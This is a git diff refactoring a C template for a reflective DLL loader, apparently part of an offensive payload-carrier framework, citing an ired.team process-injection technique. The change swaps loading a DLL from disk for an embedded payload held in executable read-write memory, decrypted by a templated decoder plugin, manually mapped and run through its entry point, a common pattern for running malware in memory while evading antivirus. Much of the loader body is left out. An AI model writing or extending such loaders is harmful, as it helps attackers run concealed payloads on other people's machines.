refactor: make dll loader more modular

data/source/carrier/dll_loader/template.c

@@ -10,11 +10,12 @@ char *supermega_payload;
 
 /* DLL loader
 
-   This code will load a DLL into memory, resolve its imports, apply relocations, and execute it.
+   This code will load a DLL (not a shellcode!) into memory, 
+     resolve its imports, apply relocations, and execute it.
 
    Loader is based on: 
-   https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
+     https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
-   with some patches to make it work here
+     with some patches to make it work here
 */
 
 
@@ -40,7 +41,7 @@ void mymemcpy(void* dest, const void* src, size_t n) {
 }
 
 
-DWORD_PTR load_shellcode(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
+DWORD_PTR load_dll(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
 	// get this module's image base address
 	PVOID imageBase = GetModuleHandleA(NULL);
 
@@ -144,20 +145,17 @@ DWORD_PTR load_shellcode(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoe
 
 int main()
 {
-	// Read DLL
+	char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
-	HANDLE dll = CreateFileA("C:\\Tools\\TestDll.dll", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
-	DWORD64 dllSize = GetFileSize(dll, NULL);
 
-	// Put it into memory
+	// FROM supermega_payload[] 
-	LPVOID dllBytes = VirtualAlloc(0, dllSize, 0x3000, PAGE_EXECUTE_READWRITE);
+	// TO dest[]
-	DWORD outSize = 0;
+	// Including decryption
-	ReadFile(dll, dllBytes, dllSize, &outSize, NULL);
+{{ plugin_decoder }}
-	CloseHandle(dll);
 
-	// load the DLL
+	// Load the DLL at dest
 	DWORD_PTR dllBase;
 	DWORD aoep;
-	load_shellcode(dllBytes, &dllBase, &aoep);
+	load_dll( (void *) dest, &dllBase, &aoep);
 	DLLEntry DllEntry = (DLLEntry)(dllBase + aoep);
 	(*DllEntry)((HINSTANCE)dllBase, DLL_PROCESS_ATTACH, 0);